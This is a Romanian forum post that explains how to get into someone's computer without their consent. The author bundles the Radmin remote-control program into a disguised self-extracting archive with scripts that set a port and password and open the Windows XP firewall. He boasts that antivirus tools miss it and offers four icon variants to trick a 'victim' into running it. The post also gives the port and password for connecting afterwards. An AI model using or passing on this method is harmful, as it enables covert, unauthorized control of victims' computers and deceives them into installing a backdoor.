Doriti să reactionati la acest mesaj? Creati un cont în câteva clickuri sau conectati-vă pentru a continua.

:: y2kZone Forum :: Created bY Senzi :: Games Community
 
AcasaAcasa  Ultimele imaginiUltimele imagini  CăutareCăutare  ÎnregistrareÎnregistrare  Conectare  

 

 Cum Intri La Cineva In Calculator Fara Accesul Lui?

In jos 
AutorMesaj
Senzi
y2kZone Detinator
y2kZone Detinator
Senzi


Mesaje : 133
Data de înscriere : 10/06/2008

Cum Intri La Cineva In Calculator Fara Accesul Lui? Empty
MesajSubiect: Cum Intri La Cineva In Calculator Fara Accesul Lui?   Cum Intri La Cineva In Calculator Fara Accesul Lui? EmptyMier Iun 11, 2008 5:54 am

Este vorba de Radmin, un program foarte vechi cu ajutorul caruia poti patrunde intr-un sistem win32, controland-ul de la distanta. Programul nu este detectat ca virus de majoritatea antivirusilor(setati pe default).
Am facut o aplicatie SFX cu WinRAR in care se afla programul + mici scripturi visual basic care ajuta la setarea portului, a parolei si pt a face o gaura in firewall-ul WinXp-ului pt a permite orice activitate pe portul setat.

Programul il gasiti aici !
Arhiva cu virusii ii gasiti aici

In arhiva cu virusii gasiti 4 programe; fiecare din ele face acelasi lucru, icon-ul fiind singurul care difera
Tot ce trebuie sa faceti este sa dati unul din cele 4 programe victimei (am pus 4 icoane diferite, voi alegeti 1 singur.. cea care se potriveste cel mai bine situatiei)iar dupa ce aceasta il ruleaza va conectati cu RADMIN la IP-ul ei, pe PORTUL 5445, PAROLA xplicit


Mai simplu de atat nu stiu ce ar putea fi! Daca aveti intrebari sau nelamuriri ...just ask!
Sus In jos
https://y2kzone.forumgratuit.ro
 
Cum Intri La Cineva In Calculator Fara Accesul Lui?
Sus 
Pagina 1 din 1
 Subiecte similare
-
» Cum Sa Faci Un Setup Fara Niciun Program!

Permisiunile acestui forum:Nu puteti raspunde la subiectele acestui forum
 :: Diverse :: Programe-
Mergi direct la: